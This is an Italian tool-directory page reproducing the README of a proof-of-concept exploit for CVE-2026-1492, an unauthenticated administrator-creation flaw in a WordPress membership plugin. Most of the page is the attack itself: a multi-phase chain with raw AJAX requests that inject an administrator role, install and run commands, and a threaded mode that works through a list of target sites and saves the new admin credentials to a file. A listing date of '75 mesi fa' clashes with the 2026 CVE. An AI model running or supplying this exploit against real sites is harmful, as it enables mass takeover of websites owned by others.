Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-1492 — User Registration & Membership <= 5.1.2 - Escalation dei privilegi non autenticata tramite la registrazione dell'iscrizione | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2026-1492
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubnxploited/cve-2026-1492

CVE-2026-1492

User Registration & Membership <= 5.1.2 - Escalation dei privilegi non autenticata tramite la registrazione dell'iscrizione

Vedi Repository
75 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-1492

User Registration & Membership <= 5.1.2 - Escalation dei Privilegi Non Autenticata tramite la Registrazione alla Membership

Typing SVG


🔴 Panoramica della Vulnerabilità

CVE-2026-1492 — Escalation dei Privilegi Non Autenticata tramite la Registrazione alla Membership

CampoDettagli
CVE IDCVE-2026-1492
GravitàCRITICA — Punteggio CVSS v3.1: 9.8
VettoreCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
Software InteressatoUser Registration & Membership — Plugin per WordPress per la creazione di form di registrazione personalizzati, form di login personalizzati, profilo utente, restrizione dei contenuti e membership
Versioni InteressateTutte le versioni fino alla 5.1.2 inclusa
Tipo di VulnerabilitàGestione Impropria dei Privilegi — Creazione Non Autenticata di Account Amministratore
Autenticazione RichiestaNessuna
CWECWE-269: Gestione Impropria dei Privilegi

Descrizione:
Il plugin User Registration & Membership per WordPress è vulnerabile all'Escalation dei Privilegi Non Autenticata in tutte le versioni fino alla 5.1.2 inclusa. La vulnerabilità deriva dal fatto che il gestore AJAX user_registration_membership_register_member accetta un valore role fornito dall'utente durante il processo di registrazione alla membership senza applicare alcuna lista consentita lato server o verifica delle capacità. Un attaccante remoto completamente non autenticato può creare una catena di richieste AJAX multi-step — registrando prima un nuovo account utente, poi inviando una chiamata register_member dannosa con "role": "administrator" iniettato nel payload JSON members_data — per creare silenziosamente un account Amministratore WordPress con pieni privilegi. Ciò comporta la compromissione totale dell'installazione WordPress interessata senza richiedere alcuna interazione con l'utente.


🛠️ Descrizione dello Strumento

Questo è uno script di sfruttamento Proof-of-Concept (PoC) che implementa una catena di attacco completa e state-aware contro siti WordPress che eseguono una versione vulnerabile del plugin User Registration & Membership. Lo strumento esegue uno sfruttamento intelligente multi-fase con scoperta automatica, estrazione dei piani, raccolta dei nonce, registrazione a doppio flusso, iniezione del ruolo e verifica dell'amministratore.

🔗 Catena di Attacco Completa

[Discovery Phase]
  GET /membership-pricing/  →  Extract membership plan IDs
  GET /registration/        →  Extract form fields, nonces, AJAX params

        ↓

[Registration Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_user_form_submit
  → Register new user account

        ↓

[Role Injection Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_membership_register_member
  members_data={"role":"administrator", "membership":"<id>", ...}
  → Inject administrator role into newly created account

        ↓

[Admin Verification Phase]
  GET /wp-admin/  →  Check for admin dashboard indicators
  GET /wp-admin/plugin-install.php  →  Confirm plugin-install access

        ↓

[Fallback Override — Flow B]
  If Flow A admin check fails → repeat with fresh username/email

        ↓

[Write to Nx_admin.txt]
  Format: https://target.com/wp-login.php user:<u> pass:<p>

📋 Requisiti

Requisiti di Sistema

  • Python 3.8 o superiore
  • Linux / Windows / macOS

Dipendenze Python

pip install requests urllib3 rich

Oppure tramite file dei requisiti:

pip install -r requirements.txt

requirements.txt:

requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

🚀 Installazione

# Clona il repository
git clone https://github.com/Nxploited/CVE-2026-1492.git
cd CVE-2026-1492

# Installa le dipendenze
pip install -r requirements.txt

# Esegui lo strumento
python3 CVE-2026-1492.py

⚙️ Utilizzo

Esecuzione di Base

python3 CVE-2026-1492.py

Lo strumento utilizza un'interfaccia terminale completamente interattiva basata su Rich. Tutti i parametri vengono richiesti a runtime.


🗂️ Formato della Lista dei Target

Crea un file di testo semplice (predefinito: list.txt) con un target per riga:

https://target1.com
https://target2.com
http://target3.com/wordpress

🖥️ Prompt Interattivi

Targets file [list.txt]: list.txt

Credentials:
  - Username prefix: random number is added per site (fresh user per target/plan/flow)
  - Email: if left empty, it will be built from the username automatically
  - Password: fixed for all sites

Username prefix (optional): Nxploited
Email (optional): 
Password [Nx_12999]: Nx_12999
Threads [3]: 5
HTTP timeout (seconds) [10]: 10

🔬 Analisi Approfondita dello Sfruttamento

Fase 1 — Scoperta

Lo strumento scopre e analizza automaticamente:

TargetCosa viene Estratto
/membership-pricing/ID dei piani di membership, link alla pagina di registrazione
/registration/Campi del form, nonce, URL AJAX, input radio della membership
Oggetto JS user_registration_paramsnonce ajax_url, security, metadati del form
ur_membership_frontend_localized_datanonce specifico della membership, endpoint AJAX

Fase 2 — AJAX di Registrazione

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_user_form_submit
&form_data=[{"field_name":"user_login","value":"Nxploited_A_482910",...}]
&form_id=1
&ur_frontend_form_nonce=<extracted_nonce>
&security=<extracted_security>
&is_membership_active=<membership_id>

Fase 3 — AJAX di Iniezione del Ruolo (La Chiamata Vulnerabile)

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_membership_register_member
&members_data={"membership":"<id>","payment_method":"free","role":"administrator","username":"Nxploited_A_482910",...}
&form_response={...}
&_wpnonce=<membership_nonce>
&security=<membership_nonce>

⚠️ Il server accetta il campo role dal client senza alcuna validazione tramite lista consentita — questa è la causa principale di CVE-2026-1492.

Fase 4 — Verifica dell'Amministratore

Lo strumento apre una nuova sessione, effettua il login con le credenziali appena create e verifica:

EndpointIndicatore Controllato
/wp-admin/adminmenu, wp-admin-bar, manage_options
/wp-admin/users.phpusers.php
/wp-admin/plugin-install.phpupload-plugin, plugin-install-tab

Scarica lo strumento